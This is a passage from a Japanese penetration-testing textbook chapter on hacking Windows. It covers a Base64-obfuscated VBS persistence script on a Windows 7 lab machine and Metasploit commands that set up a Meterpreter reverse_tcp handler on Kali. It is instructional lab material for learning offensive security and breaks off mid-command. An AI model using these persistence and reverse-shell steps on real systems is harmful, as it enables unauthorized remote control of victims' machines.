
261
第4章 Windows のハッキング
"oxwdrhk.vbs" ファイルをテキストエディターで開くと、ソースコードを確認
できます。しかし、一部がBase64で難読化されており、そのままでは読み取れな
いようになっています(図4-18)。
図4-18 ソースコードは Base64で難読化されている
それでは、Windows 7の再起動時に自動的にセッションが確立することを確認
します。Windows 7を終了させると、Kali 側ではセッション 2が閉じます。
meterpreter >
[*] 10.0.0.102 - Meterpreter session 2 closed. Reason: Died ←
←
[Enter]キーを押す。
msf exploit(windows/local/bypassuac) >
Kali側では、ステップ⑤と同様にして、リバースシェル(reverse_tcp)の待ち
受け状態を作り直します。
msf > use exploit/multi/handler
msf exploit(multi/handler) > set payload windows/meterpreter/↲
reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(multi/handler) > set LHOST 10.0.0.2
LHOST => 10.0.0.2
msf exploit(multi/handler) ...